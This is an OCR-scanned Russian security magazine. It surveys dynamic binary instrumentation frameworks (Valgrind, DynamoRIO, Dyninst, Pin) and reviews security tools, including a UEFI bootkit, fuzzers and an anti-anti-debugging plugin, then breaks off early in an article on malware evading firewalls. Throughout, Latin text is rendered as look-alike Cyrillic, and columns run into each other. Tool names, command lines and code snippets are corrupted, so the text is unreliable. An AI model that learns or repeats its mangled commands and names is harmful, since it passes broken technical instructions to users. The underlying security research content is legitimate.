ментации пользовательского уровня наиболее популярны: 

* Рі п (щѵщп ІооІ.ог } ; 

■ ѴаІдгіпсІ ( }; 

ОупатоПІО (сі ѵпато гіо.ого): 

Оуп і п зі ( ѵѵѵѵ^. сіупіп з і.огр ) . 

О них сегодня и пойдет разговор. 

* Динамическая бинарная инструментация (Оупатіс Віпагу Іпгіги- 
тепіаііоп, О В I ) — это техника анализа, которая предполагает вставку 
дополнительного кода в запущенный процесс. 

■ Фреймворк для динамической би нарной инструментации (Оупатіс 
Ыпагу іпвігитепіаііоп Ігатеѵѵогк) - это специальная библиотека 
для создания ОВА-инструментов, 

■ Динамический бинарный анализатор (Оупатіс Ыпагу апаіузіз, 

РВА) - это инструмент, созданный с помощью ОВІ-фреймворка и не- 
сущий в себе логику того, когда/где добавлять новый код, и непосред- 
ственно сам добавляемый код. 
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ѴаідгіпсІ — это открытая библиотека для разработки инструментов ди- 
намического анализа, которая появилась на свет в далеком 2002 году. 
Первоначально представляла собой свободный инструмент для отладки 
использования памяти в операционной системе Ыпих, но с тех пор транс- 
формировалась в обобщенный фреймворк для создания инструментов 
динамического анализа, таких как программы проверки и профилиров- 
щики. На текущий момент имеет в своем арсенале несколько высококаче- 
ственных инструментов: 

1 . МеплсИеск — детектор ошибок памяти. 

2. Сасіпедгіпс! — профайлер кеша и профайлер предсказания ветвей, помо- 
гающий разрабатывать более быстрые программы. 

3. СаІІдгіпсІ — профайлер для генерации графа вызовов. 

4. НеідгіпсІ — детектор ошибок потоков, способный помочь разрабатывать 
корректные многопоточные приложения. 

5. ЭРО — еще один детектор ошибок потоков, очень похожий на НеідгіпсІ, 
но использующий другие техники и фиксирующий другие проблемы. 

6. Мазей — профайлер кучи, помогающий разрабатывать программы 
с меньшими потребностями памяти. 

7. РНАТ — различные профайлеры кучи. 

8. РІгсИеск — экспериментальный детектор перерасходован ия кучи, стека 
и глобального массива. 

9. ВВѴ — экспериментальный генератор вектора базовых блоков. 

ѴаідгіпсІ работает на следующих программно-аппаратных платформах: 
Х86/1_іпих, АМ064/і_іпих, АНМ/Ыпих, РРС32/І_іпих, РРС64/І_іпих, 3390Х/ 
!_іпих, АНМ/АпсІгоісі (2.3.x), Х86/Оапл/іп и АІѴЮб4/Оапл/іп (08 X 10.6 и 10.7). 
Если немного поколдовать с ѴѴіпе и ѴаідгіпсІ, то можно проинструментиро- 
вать и ѴѴіпбоѵѵз-программы. 

ИНСТРУМЕНТАЦИЯ 

Чтобы проанализировать приложение с помощью ѴаідгіпсІ, его не надо 
перекомпилировать, перелинковывать или вносить иные изменения. Дело 
в том, что для своей работы ѴаідгіпсІ использует динамическую бинарную 
рекомпиляцию, то есть оригинальная программа транслируется во времен- 
ную, более простую форму, называемую промежуточным представлением, 
которая затем инструментируется и преобразуется обратно в машинный 
код. Запуск программы под ѴаідгіпсІ выглядит следующим образом: 

. /ѵ аІЕг Іп сІ [ѵаіёгіпсі-ор^іопзі^іооі^ооі-пате уоиг-ргоа 

[ уоиг - рго^-ор1:іоп5І 

ѵаідгіпсі-орйопз — параметры работы ѴаідгіпсІ (параметр -ІооІ указыва- 
ет, какой инструмент использовать при инструментации, ІооІ_пате — - 
название инструментального модуля); 

• уоиг-ргод — название исследуемой программы; 

• уоиг-ргод-орііопз — параметры запуска исследуемой программы. 

Исследуемая программа запускается на псевдоСРІІ, предоставленном 
ядром ѴаідгіпсІ. При первом выполнении ядро обрабатывает код с помо- 
щью выбранного инструмента (опция -ІооІ) и помещает результат в кеш. 
В дальнейшем уже инструментируемый код берется из кеша. Также туда 
добавляется инструментирующий код и обрабатывается результат, вер- 
нувшийся от ядра системы. 

ѴаідгіпсІ имитирует выполнение каждой инструкции исследуемой про- 
граммы. Из-за этого активные проверки инструмента или профайлера 
выполняются не только для исследуемого приложения, но и для поддер- 
живающихся динамически связанных библиотек, включая С-библиотеку, 
графические библиотеки и так далее. 



Ѵа1§гіпа 

Любой инструмент, написанный с помощью ѴаідгіпсІ, должен содержать 
по крайней мере четыре функции: 

• рге_сІо_іпй() — отвечает за большинство задач инициализации; 

• роз1_сІо_іпй() - отвечает за постинициализацию и используется только 
в случае, если реализуемый инструмент имеет параметры командной 
строки и должен проводить какую-то инициализацию после того, как они 
обработаны; 

• іпз{гитепІ() — занимается непосредственно инструментацией ѴЕХ ІВ 
кода; 

• Тіпі( ) — отвечает за стадию завершения, на которой обрабатываются по- 
лученные результаты (заносятся в лог-файлы, выводятся на экран и так 
далее). 

ЭТАПЫ РАБОТЫ 

Всю работу инструмента в ѴаідгіпсІ можно разделить на три основных части: 

• инициализация; 

• инструментация; 

• завершение. 

На этапе инициализации различаются следующие сущности: 

• Детали. Устанавливаются с помощью функций Ѵ0_(бе1аі1з_* *). Можно ска- 
зать, что это некоторый вид настроек. 

• Потребности. Устанавливаются с помощью функций ѴЗ_(пеесІ5_*}. В ос- 
новном носят булевый характер и по умолчанию установлены в Раіве. 
Здесь определяется, какие вещи может делать инструмент: запись, до- 
клад и подавление ошибок, обработка параметров командной строки; 
обертка системных вызовов, запись дополнительной информации о бло- 
ках кучи и так далее. 

• Отслеживаемые события. Устанавливаются с помощью функций ѴО_ 
(Ігаск_*). Определяют, о каких событиях ядро хочет получать уведомле- 
ния. Это может быть, например, выделение нового блока кучи или изме- 
нение указателя стека. Если инструмент хочет знать об этом, он должен 
предоставить указатель на функцию, которая будет вызываться при воз- 
никновении данного события. 

При фазе инструментации происходит непосредственно сама обработ- 
ка кода. Ядро дизассемблирует блок кода в промежуточное представле- 
ние — ѴЕХ ІВ (ѴЕХ ІП — ВІЗС-подобный промежуточный язык представле- 
ния ѴаідгіпсІ, его подробное описание можно посмотреть в заголовочном 
файле ѴЕХ/риЬ/ІіЬѵех іг.й), которое инструментируется анализирующим 
ЭВА и затем обратно конвертируется ядром в машинный код. Результат 
трансляции сохраняется в кеше кода (который создан для хранения уже 
обработанного кода, что экономит время на повторную его обработку) 
и используется по мере необходимости. 

Самый простой способ инструментировать ѴЕХ ІВ — вставить вызовы 
С-функций, когда происходит интересное нам событие. Однако, как сооб- 
щается в документации на официальном сайте, не все функции из библио- 
теки С можно использовать для этого. Список доступных вариантов можно 
посмотреть в файле риЬІооИіЬсМі. 

Что касается фазы завершения, то тут происходит представление окон- 
чательных результатов, таких как резюме собранной информации. На этом 
этапе вся собранная информация записывается в лог-файлы. 

Несмотря на популярность проекта, документирован ѴаідгіпсІ достаточно 
скупо. Ситуацию спасает то, что проект полностью открытый: наилучшей до- 
кументацией на данный момент можно считать комментарии в его исходном 
коде и инструменты, входящие в его поставку. О популярности инструмента 
говорит его активное использование в разработке таких проектов, как Рігеіох, 
Орега, МуЗОЦ РозідгеЗОЦ Регі, РНР, РуНпоп, СЫОМЕ, КйЕ и многих других. 



ОѴЫАМОШО 



ОѴНАМОПІО 

ОупатоВІО — это система манипуляции кодом в процессе его выпол- 
нения, предоставляющая интерфейс для построения динамических ин- 
струментов, решающих широкий спектр задач: программный анализ, 
профилирование, инструментация, оптимизация, трансляция и так да- 
лее. Она позволяет вставлять функции обратного вызова / трамплины 
и выполнять произвольные изменения в коде благодаря использованию 
собственной мощной библиотеки для манипуляции над ІА-32/АІѴЮ64- 
инструкциями. Поддерживает инструментацию приложений, работаю- 




щих в операционных системах ѴѴіпсІоѵ/з или Ыпих на процессорах ІА-32 
и АІУЮ64. 

АЛГОРИТМ РАБОТЫ 

ОупатоПІО предстает в виде виртуальной машины, которая располагает- 
ся между исследуемым приложением и операционной системой. Ее зада- 
ча — переключить выполнение приложения от оригинальной инструкции 
на инструкцию в кеше кода, где инструкции могут свободно изменяться. 
В процессе анализа ОупатоПІО занимает адресное пространство вместе 
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с исследуемым приложением и имеет полный контроль над его исполне- 
нием. 

Так же как и в ѴаІдгіпсІ, здесь для повышения производительности ис- 
пользуется кеш кода, куда копируются базовые блоки исследуемой про- 
граммы. Причем блок, который напрямую нацелен на другой базовый 
блок, уже находящийся в кеше, связывается с ним во избежание допол- 
нительных расходов на переключение диспетчера ОупатоКІО. Часто вы- 
полняющиеся последовательности базовых блоков объединяются в следы 
(трейсы), которые также помещаются в кеш кода. 

В терминах ОупатоВІО инструмент, написанный с помощью его АРІ 
для решения определенной задачи инструментации, называется клиен- 
том. Клиент представляет собой библиотеку, которая совместно с ядром 
ОупатоВІО работает над входной бинарной программой. Для взаимодей- 
ствия с клиентом фреймворк предоставляет определенные события, кото- 
рые клиент может перехватывать: 

• создание или удаление ББ и следа; 

• инициализация и завершение процесса; 

• инициализация и завершение потока; 

• создание дочернего процесса (только в Ыпих); 

• загрузка и выгрузка библиотек приложения; 

• ошибка или исключение в приложении (сигнал в Ыпих); 

• перехват системного вызова; 

• перехват сигнала (только в Ыпих). 

ИНСТРУМЕНТАЦИЯ 

Существует два метода запуска процесса под ОупатоВІО: 

1 . Одноразовая конфигурация и запуск — для этого используется бггип.ехе: 

бггип.ехе -сІ і егѵЕ с1іеп_пате. сііі рагатз рго§.ехе 

2. Двухступенчатый запуск с разделенной конфигурацией и запуском — 
для этого используется бгсопйд.ехе и сігіпіесТехе: 

б гсогФё ехе ^ге§ ргод.ехе -вѵзмісіе оп -сІі еггЕ <-■ 

с1іеп1:_пате .611 рагатз 

Второй вариант пригодится при длительном исследовании программы, 
избавив от необходимости каждый раз при очередном запуске анализиру- 
емого приложения вбивать в командную строку параметры инструмента- 
ции. При последующем запуске программы ргод.ехе с помощью сігіпіесі. 
ехе она будет запущена под ОупатоВІО с клиентом сііеп^пате.сІІІ. Снять же 
регистрацию обработки приложения ргод.ехе можно следующим образом: 

сІгсопЯ^. ехе -ипге§ рго§.ехе 

Утилита бгсопТід.ехе или соответствующая библиотека сІгсопТідМЬ.сШ 
могут также использоваться для так называемого подталкивания (писіде) 
запущенных процессов: 

ОУЫІЫ8Т 




б гсопбё.! ехе -пиб§е ргод.ехе рагатз 

Подталкивание является предпочтительным механизмом для передачи 
данных в процесс и в основном используется для уведомления ОупатоВІО 
о необходимости перечитать входные настройки, произвести переконфи- 
гурацию или некоторые другие действия. 

ОупатоВІО может одновременно поддерживать несколько клиентов. 
Чтобы воспользоваться этой фичей, необходимо при регистрации каж- 
дого клиента указать его приоритет. ОупатоВІО будет вызывать каждую 
клиентскую процедуру бг іпіІ() последовательно в соответствии с этим 
приоритетом. Клиенты с численно более низким значением приоритета 
вызываются первыми и, следовательно, первые получают возможность 
зарегистрировать обратные вызовы (клиент с приоритетом 0 вызывает- 
ся первым). Стоит отметить, что обратный вызов, зарегистрированный 
первым, будет вызываться последним. Данная схема дает преимущество 
первому зарегистрированному обратному вызову, так как у него остается 
последняя возможность изменить поток инструкций или повлиять на ра- 
боту ОупатоВІО. 

А вообще, инструментация — это не единственное предназначение 
данного фреймворка. Благодаря богатому функционалу он может исполь- 
зоваться как автономная библиотека для ІА-32/АІѴЮ64-дизассемблера, 
декодера и базовой манипуляции инструкциями. 




Оупіпзі — это мультиплатформенная библиотека для патчинга исполня- 
емого кода, разработанная в Висконсинском университете в Мэдисоне 
и в Мэрилендском университете, которая пригодится не только для ин- 
струментации, — также она окажется весьма полезной при разработке 
инструментов оценки производительности, отладчиков и симуляторов. 
Оупіпзі АРІ был разработан в рамках проекта Рагабуп, целью которого было 
создание эффективного метода динамической инструментации без силь- 
ной модификации исполняемых файлов. 

ИНСТРУМЕНТАЦИЯ 

На сегодняшний день Оупіпзі позволяет вставлять код как в уже запущен- 
ное приложение (процесс), так и в просто расположенное на диске. Иначе 
говоря, эта программная библиотека поддерживает динамическую и ста- 
тическую бинарную инструментацию. В основе АРІ лежат абстракции про- 
граммы, две основные из которых: 

* точки (іпзіроіп'із) — места в программе, где может быть вставлена инстру- 
ментация; 

• фрагменты (зпірреіз) — представление некоторого исполняемого кода 
для вставки в точку программы. 

Алгоритм работы выглядит следующим образом. Пользователь пишет 
так называемый мутатор, который использует Оупіпз'І-библиотеку для воз- 
действия на исследуемое приложение. Процесс, который содержит му- 



татор и Оупіпз'І-библиотеку, известен как процесс мутации. Процесс му- 
тации работает над другим процессом или бинарным файлом на диске, 
которые в терминах проекта Оупіпзі называются мутанты. 

Для выполнения основных операций над процессом мутатор исполь- 
зует те же службы операционной системы, что и отладчики (например, 
рігасе, файловую систему /ргос). Эти службы обеспечивают способы кон- 
троля над выполнением процесса, а также методы чтения и записи в его 
адресное пространство. 

Для генерации кода фрагменты транслируются в машинный код в па- 
мяти мутатора, а затем копируются в массив адресного пространства 
инструментируемого приложения. Наиболее сложная часть вставки ин- 
струментации — аккуратная модификация ветки оригинального кода 
на сгенерированный новый код. Для этого используются небольшие фраг- 
менты кода — «батуты» Дгатроііпез). Батут обеспечивает способ пере- 
мещения из точки, где необходимо вставить инструментирующий код, 
до нового сгенерированного кода. Для этого в точке инструментирования 
заменяется одна или более инструкций на ветку начала базового батута. 
Базовый батут содержит код перехода на мини-батут, который, в свою 
очередь, содержит инструкции для сохранения/восстановления текущего 
состояния (регистров и так далее) и выполнения желаемого функционала. 
То есть при достижении мини-батута происходит сохранение регистров, 
затем выполняются заданные действия, после чего состояние регистров 
восстанавливается и управление передается обратно на базовый батут. 
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Инструментация — эволюция анализа 
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ДОПОЛНИТЕЛЬНЫЙ ФУНКЦИОНАЛ 

Помимо самого Оупіпзі АРІ, в комплекте поставляются еще несколько на- 
боров АРІ: 

- ЗутІаЬАРІ — , предоставляет функционал для бинарной перезаписи: от- 
крытие существующего бинарного файла, добавление новых символов, 
зависимостей от библиотек, новых регионов кода и данных, межмодуль- 
ных ссылок, модификация существующего кода и данных, запись бинар- 
ника; 

• ІпзІгисІіопАРІ — предоставляет функционал для детального анализа се- 
мантики инструкций; 



* РагзеАРІ — АРІ для парсинга и извлечения графа потока управления из би- 
нарного кода; 

- Зіаскіл/аІкегАРІ — предоставляет функционал для интерфейса отладчика; 

* РгосСопТгоІАРІ — платформонезависимый АРІ для создания, мониторинга 
процессов и управления ими; 

* ЭупС — АРІ для более простого и удобного описания инструментации 
в Оупіпзі. 

Можно сказать, что весь функционал Оупіпзі делится на три части: ди- 
намическая инструментация, бинарная перезапись, бинарный анализ. 




Ну и последним номером в нашем обзоре идет библиотека Ріп. Это бес- 
платная разработка компании Іпіеі, поставляется она с частично открыты- 
ми исходными текстами в виде ЗОК для І_іпих, ѴѴіпбоѵѵз и ОЗ X и работает 
на архитектурах ІА-32, ІА-64 (Ііапіит), ІпІеІ64 (х86_64). Структурно ее мож- 
но разделить на основное приложение (ріп.ехе), внедряемое в контекст 
анализируемого процесса ядро (ріпѵт.сНІ}, и разрабатываемый пользова- 
телем инструментальный модуль (он также внедряется в контекст анали- 
зируемого процесса). 

ИНСТРУМЕНТАЦИЯ 

Инструментальный модуль — это □□.-библиотека, использующая предо- 
ставляемый ядром Ріп интерфейс. Суть работы с АРІ фреймворка сводит- 
ся к регистрации обработчиков, которые будут вызываться ядром в ходе 
исполнения кода исследуемого приложения и либо логировать информа- 
цию, связанную с ходом выполнения программы, либо менять логику ис- 
полнения кода приложения любым образом, который разработчик инстру- 
ментального модуля сочтет нужным. 

Для того чтобы запустить анализ приложения под Ріп, надо выполнить 
следующую команду: 



ріп_. ехе [ ріп_ор~ЬіоП5 ] -1: ріггЬоо1_пате.сІ11 

[рі п1оо1_ор'Ьіоп5] -- арр_пате . ехе 

• ріп_орІіопз — параметры работы Ріп; 

• ріпІооі_пате.сШ — инструментальный модуль; 

» ріпІооі_орІіопз — параметры инструментального модуля; 

• аррпате.ѳхе — инструментируемое приложение. 

Динамическая бинарная инструментация в Ріп может быть выполнена 

двумя способами: 

• РгоЬе — способ инструментации исключительно на уровне гранулярности 
процедур. В начало функции помещается инструкция ]плр, которая пере- 
направляет поток управления на замещающую (анализирующую) проце- 
дуру. Однако, несмотря на то что данный способ дает улучшение в про- 
изводительности по сравнению с ЛТ-инструментацией, его применение 
не всегда возможно; 

• ЛТ — способ инструментации, когда исходный бинарный код компили- 
руется в новый (с добавлением необходимых для анализа вставок кода) 
и выполняется, сохраняя абсолютно всю логику исходного приложения. 



Адресное пространство процесса 





ТОВЕСОІЛІІІІІЕО... 

Сегодня мы познакомились с ос- 
новными йВІ-движками и полу- 
чили небольшое представление 
о каждом из них. Теперь, зная ал- 
горитмы их работы, преимущества 
и недостатки, ты способен само- 
стоятельно выбрать, какой из них 
использовать в той или иной си- 
туации. Ну а в следующей статье 
мы подробно разберем работу 
с фреймворком Ріп и покажем, 
как его можно использовать в об- 
ласти информационной безопас- 
ности. Не пропусти :). С-С 



9 ° 
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ОТАЮШС 

Внимание! Информация представлена исключи- 
тельно с целью ознакомления! Ни авторы, ни редак- 
ция за твои действия ответственности не несут! 




Дмитрий «ОІдЬ Евдокимов, 
Оідііаі БесигИу 
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СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 
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Автор: І(2ік КоІІег 
Система: 

ѴѴіпсІош/ипих/Мас 




ІІЕРІ ВООТКІТ 



ГРАФИКА В ПОМОЩЬ 



НАСКЕК8НЕЫ. 



ІІпіТіесІ ЕхТѳпзіЫе Рігт\л/аге Іпіегідсе (УЕРІ) — ин- 
терфейс между операционной системой и ми- 
кропрограммами, управляющими низкоуровне- 
выми функциями оборудования. Его основное 
предназначение — корректно инициализировать 
оборудование при включении системы и пере- 
дать управление загрузчику операционной си- 
стемы. Создавался он с целью модернизации 
процесса загрузки ОС. Нужно понимать, что ІІЕР! 
полностью не заменяет ВІОЗ и обычно не обра- 
батывает конфигурацию всего железа во время 
загрузки, и при этом он может быть реализован 
в виде надстройки над ВІОЗ (С8М). 

Такая технология, конечно, не может не инте- 
ресовать вирусописателей — авторов ЬооШТов. 
А практическую возможность реализации иЕРІ 
ЬооШТа показал исследователь информацион- 
ной безопасности, создав проект ОгеатЬооІ:. 

ОгеатЬооІ — это экспериментальный Ьооікіі 
для Міпсіоѵѵз 8 х64. Сам Ьооікіі: выполнен в виде 
130 с РАТ32-партицией и ЕРІ РЕ бинарника. 
При этом он способен: 

- нарушить работу ядра ОС; 

• обойти локальную аутентификацию; 

• поднять привилегии. 

Этапы работы ОгеатЬооІ: на уровне загруз- 
чика включают в себя захват Ьоо1тд1жеб, за- 
хват ѵѵіпІоасІ.еТі и прыжок через первоначально 
смапленный код; на уровне ядра — отключение 
защиты ядра, перевыделение кода ОгеатЬооІ 
и РзЗеІЬоасІІтадеМо!і^уВоиІіпе(). 

Исследование ЫЕРІ очень молодо и очень 
перспективно. В ближайшее время в данном на- 
правлении будут смотреть как искатели уязви- 
мостей, так и вирусописатели. 



При исследовании работы той или иной про- 
граммы в набор исследователя всегда входят та- 
кие инструменты, как Ргосезз Мопііог (Ргостоп) 
от Зузіпіегпаіз для создания лог-файлов с собы- 
тиями, происходящими в системе (обращение 
к ключу реестра, запись в файл, создание сетево- 
го соединения и так далее), и ѴѴігЮитр/ісрсІитр 
для записи сетевого трафика в РСАР-логи. Ин- 
формации собирается много, и качественно ее 
анализировать сложно. Но это было до недавнего 
времени. 

Теперь появился РгосЭОТ, который берет со- 
бранную информацию от Ргостоп и ѴѴіпЭитр/ 
Ісрбитр, соотносит ее и представляет в виде 
графа с помощью графической библиотеки 
СгарЬѵіг. У полученного графа в качестве узлов 
сущности типа: процесс, поток, файл, ключ рее- 
стра и удаленный сервер, а в качестве дуг — дей- 
ствия: чтение/извлечение/получение, запись/ 

установка/отправка, создание процесса, инъек- 
ция, удаление и так далее. При этом узлы и дуги 
могут отличаться по цвету и по толщине, что не- 
сет дополнительную смысловую нагрузку, как, на- 
пример, о жизни данного процесса (работает ли 
он после остановки Ргостоп), так и о количестве 
трафика, потраченного на общение с удаленным 
сервером. В общем, все, что только может быть 
полезным при анализе работы процесса. Стоит 
сказать, что первоначальная цель проекта — это 
визуализация поведения вредоносного ПО. 

Еще есть очень крутая возможность просма- 
тривать все произведенные процессом действия 
в хронологическом порядке в виде мультика, ис- 
пользуя ползунок прокрутки времени. 

На сайте проекта есть хорошие руководства, 
описывающие весь интерфейс и работу с графом. 



Очень часто при пентесте приходится пользовать- 
ся большим количеством хакерских программ. 
При этом нередко результаты работы одной про- 
граммы служат входными данными для других 
программ. Весь этот процесс довольно длитель- 
ный, а, как известно, пентестер ограничен во вре- 
мени. Для решения данной задачки был разрабо- 
тан инструмент под названием Наскегзіі. 

НаскегзН (Наскег ЗІіеІІ) — это бесплатная обо- 
лочка (командный интерпретатор) с открытым ис- 
ходным кодом на Руйіоп с Руііюпесі-подобным 
синтаксисом, встроенными командами, свя- 
занными с безопасностью, и оболочками над 
различными инструментами для безопасности. 
Оболочка напоминает ІІпіх ріреііпе с одним лишь 
отличием, что обрабатывает информацию и ме- 
таданные, связанные с безопасностью, а не поток 
байт. Благодаря этому достаточно просто и легко 
передавать результаты работы одной программы 
для последующей обработки другой программой. 

Среди инструментов данная оболочка поддер- 
живает: 

- Атар; - МИо; ■ ХргоЬе2; • ѴѴЗа?; 
■ МЫзсап; • ІМтар; ■ Зцітар; ■ Ріпд. 

Пример запуска: 

"Ь'Ь'Ер: //ІосаІІіоз'Е" - > и гі -> птар*^ 

X"- 5 5 -Р0 -Т З" ) -> Ілі За-р -> рг іітЬ 

В данном примере порты, полученные при ска- 
нировании ІМтар, запущенного с параметрами 
"-зЗ -Р0 -ТЗ", будут просканены программой ѵѵЗа'І 
на уязвимости для ГгНр://ІосаІГі08І 

Зависимости проекта: РуШоп 2.7 и Руібопесі 
от 0.4.2. 
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Автор: СгошІЗігіке 
Система: ѴѴіпсІоѵѵз 



'шг.сгомі: 
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сгоѵѵсі і пзресі/і пйех. ІтЕ т I 



ВРЕДОНОСНЫЕ СВЯЗИ 
ПОД КОНТРОЛЕМ 

Сгслл/сііпзресі — инструмент, призванный помочь и репутации домена, с которым установлено со- 



предупредить пользователя о наличии потен- 
циальных вредоносных программ, которые осу- 
ществляют взаимодействие по сети и существуют 
на вашем компьютере. Программа представляет 
собой Ііозі-Ьазесі инструмент проверки процес- 
сов и для обнаружения недоверенных или вредо- 
носных сетевых процессов использует различные 
источники информации и онлайн-сервисы. 

Благодаря этим проверкам можно опре- 
делять репутацию процесса. Она вычисляется 
из успешности/неуспешности пройденной про- 
верки по каждому сервису (отображается в спе- 
циальном поле цветом: зеленый/серый/красный} 



единение. 

Помимо простого отображения сетевого взаи- 
модействия, Сгслл/сііпзресі ассоциирует их с про- 
цессом, ответственным за его действия. При этом 
отображает как имя процесса, так и полный путь 
до исполняемого файла в системе. А также Ю 
процесса, локальный порт, локальный ІР-адрес, 
удаленный порт, удаленный ІР-адрес и разре- 
золвленное ОІЧЗ-имя удаленного ІР-адреса, 
при этом стоит сказать, что программа работает 
как с ІРѵ4-, так и с ІРѵб-адресами. 

ВТѴѴ, тулза может определять и ШгеасІ іпіесііоп, 
так любимую вредоносными программами. 




Маіп Родс 
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Интерес к анализу защищенности мобильных 
приложений все растет, и возникают все новые 
инструменты, упрощающие трудовые будни ис- 
следователей. Так, совсем недавно появился 
инструмент ІМаІугег для динамического анализа 
приложения под ЮЗ. Сам инструмент исполь- 
зует хорошо всем известную библиотеку Сусгірі 
от Заигік. Для тех, кто не знает, что такое Сусгірі: 
это ЗаѵаЗсгірІ-интерпретатор, который также по- 
нимает синтаксис ОЬіесІіѵе-С и позволяет присо- 
единяться к запущенной программе и изменять 
ее функции. 

После установки приложения на устройстве 
открывается порт 5544, и для обращения к ин- 
струменту достаточно в браузере на компьютере 
вбить: 

1тЫ: р://< уои іРеѵісе ІР> : 5544 

После чего будет предложено установить Сгарііѵіг 
Эоі и Оохудеп для графического отображения 
графов отношения между классами и парсинга 
заголовочных файлов приложения соответствен- 
но. Потом уже будет можно просматривать список 
используемых классов и их методов, а с помощью 
специальной командной строки можно и вовсе 
через Сусгірі: взаимодействовать с любым из ме- 
тодов. Это дает возможность обходить множество 
ограничений (например, таких, как Іоскзсгееп) 
или модифицировать поступающие данные 
(очень полезно при фаззинге приложения). 

Также стоит отметить, что для работы ІІМаІугег 
нужен іаііЬгеак, а для его установки достаточно до- 
бавить новый источник пакетов в Суб іа. 

Инструмент впервые был представлен на кон- 
ференции НІТВ Атзіегбат 2013. 



Одна из целей фаззинга — идентифицировать 
уязвимости таким образом и способом, каким 
никто до этого не делал, и тем самым повысить 
вероятность найти новую уязвимость. Парни 
из секьюрити-команды Могіііа при тестировании 
безопасности своей новой мобильной операци- 
онной системы Рігеіох ОЗ задумались о фаззин- 
ге на основе взаимодействия с пользователем. 
Естественно, никто не заставил миллион китай- 
цев тапать по экрану Для этого парни написали 
на Руіііоп экспериментальный фаззер под назва- 
нием Огапдіигг. Да, они автоматизировали обе- 
зьяний труд. 

Данный проект базируется на скрипте 
депегаіе-огапдиіап-зсгірі.ру и фреймворке 
Огапдиіап, который предназначен для симуляции 
нативных событий на Апбгоіб-девайсах. Для это- 
го данный фреймворк инжектит события прямо 
в ядро в /беѵ/іпрЩ системы. Для системы это пол- 
ная имитация событий, связанных с прикоснове- 
нием к экрану (продолжительность нажатия, ско- 
рость прокрутки, координаты ввода и так далее). 

В итоге данны й фаззер генери рует Огапдиіап - 
скрипт с произвольным набором различных дей- 
ствий с ІоисІі-экраном, Если ты думаешь, что по- 
добным образом ошибок не найти, то посмотри 
Ьид 838215 (ЬіІ.Іу/УЦгРЗН ). 

Для начала работы запускай . /огап^Ригі . ру , 
в результате чего будет сгенерирован файл зсгірі- 
огапдиІап-ХХХХХ.ІхІ Отправляй его на устройство 
и запускай: 

$ абЬ ризИ ~/1:гее5/огап§-Ри22/5сг Ір~Ь -<-* — 
огап§и1:ап-ХХХХХ.1:хѣ /тпѣ/зсісагб/ && 
абЬ зіпеіі /ба±а/огп§ /беѵ/іпр и ѣ/еѵ еггЕѲ <-■ 
/тп^/5бсагб/5сгірІ:-огапёиІ:ап^ХХХХХ.І:х1: 



При исследовании вредоносного программного 
обеспечения и других программ, которые не хо- 
тят, чтобы исследовали их внутренности, часто 
сталкиваешься с различными антиотладочными 
техниками. Эти техники в большинстве случаев 
хорошо известны и хорошо описаны. Кому ин- 
тересна данная тема, советую обратить внима- 
ние на документ ТКіе «ІЛІітаІе» Апіі-Оебиддіпд 
Пеіегепсе (ЬіІ.Іѵ/17ѴѴЦПЧ7 ) от Питера Ферри 
(Реіег Реггіе), где он подробно рассматривает 
огромное количество грязных приемчиков. 

И каждый раз сталкиваться с однотипными 
трюками анти отладки и тратить время на ручную 
распаковку мал вари совсем не хочется. Как раз 
чтобы избежать этого, был создан ТМе Маіѵѵаге 
апб Упраскіпд Ргатеѵ/огк, или тиііі. Данный 
фреймворк представляет собой плагин для всеми 
любимого отладчика Іттипііу РеЬиддег. 

Из возможностей тиііі можно выделить: 

• процедуры антиантиотладки; 

• патчинг функций; 

• обход обнаружения ѴМ и другие. 

Пример кода: 

+ГОГП іттІіЬ ітрогі * 
ішп тиРИ ітрогЕ * 

РеР таіп(аг§5) : 

# Создаем экземпляр отладчика и тиРН 

ітт - РеЬы{2^ег() 

гггР_ = тиРй ( ) 

# Патчим І5РеЬи§!^егРге5еп1:П 

і-Р т-р.ап^і_(іеЬид. із сІеЬиерег ргеБегтРП : 

ітт . !-ое(" БиссеззРиІІу раісРіесІ 

кегпе І32. ІзРеЬийёегРгезепі;" ) 

геіигп "ти-ррі л. РаісРііп§ сотріеѣе." 
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АЛ ЭК ГОВОРИТ, ЧТО У НЕГО ДАЖЕ ЕСТЬ РАБОЧИЕ ИСХОДНИКИ 

Сегодня развитие малвари и антивирусных технологий переживает спад — 
идеи закончились. В середине 2000-х годов прорывной идеей казался пе- 
реход вредоносного кода на уровень ядра, но теперь на пути честных мал- 

варщиков выросли новые препоны, и прямой доступ в ядро был зарублен. Александр Эккерт 

Сегодня приходится серьезно изворачиваться, чтобы подобраться к гіпд 0. БІаппіс.тап@оппаіІ.сот 





П риходится констатировать факт, что 
с обнаружением семейства ТЭ1Д038 
борьба добра и зла все-таки протекает 
с небольшим перевесом в сторону зла. 
Антивирусы толком не научились (или не хотят 
учиться?) бороться с современной малварью, 
а на горизонте уже маячит вирусня с элементами 
гипертрейдинга и искусного манипулирования 
железом. 

КАК УСТРОЕН ФАЙРВОЛ? 

Для тех, кто не в курсе, поясню. У файрвола две 
основные функции. Первая — отслеживать соз- 
дание нового сетевого соединения, для того 
чтобы выяснить, какой программой оно иници- 
ировано. Так как сетевое общение — это неотъ- 
емлемая часть почти любой малвари, то любой 
файрвол будет это делать. 

Создание нового соединения довольно 
успешно отслеживается путем перехвата соот- 
ветствующих сетевых ѴѴіпАРІ -функций или вне- 
дрением собственных сетевых объектов в сете- 
вой стек. Этим решается вторая, не менее важная 
задача файрволов — контроль за самими сетевы- 
ми соединениями. Например, предполагается, 
что если внедрение кода в доверенный процесс 
(например, зѵсііозіехе) прошло успешно, то не- 
которые файры спокойно относятся к новым со- 
единениям, устанавливаемым данным процес- 
сом. Однако приходится следить за тем, к каким 
именно внешним !Р-адресам идет обращение 
процесса, ведь, если доверенному процессу 
разрешено по правилам файрвола устанавливать 
соединения, этим пользуются разработчики цен- 
трализованных ботнетов, того же самого 2еиЗ, 
ЗруЕуе и других. В этой связи файрвол должен 
иметь список «черных» ІР-адресов (децентрали- 
зованных серверов управления. Ведь стоит один 
раз такому серверу попасть в черный список, 
и ботнет можно хоронить. Неудивительно поэто- 
му, что в настоящее время ботоводы пытаются 
создать некую систему децентрализованного 
управления ботнетами, стараясь создать некое 
подобие самообучаемости бота, когда сведения 



о центральном сервере добываются через ран- 
домные источники, например от соседних ботов 
или файлообменников. Как мне рассказывали, 
есть довольно любопытные примеры реализации 
такой децентрализованной системы... но это так, 
в качестве лирического отступления. 

Как действует файрвол и для чего это нужно, 
мы уже определились, едем дальше. 

НЕМНОГО ИСТОРИИ 

Как я уже говорил, процесс развития вирусных 
и антивирусных технологий всегда состязатель- 
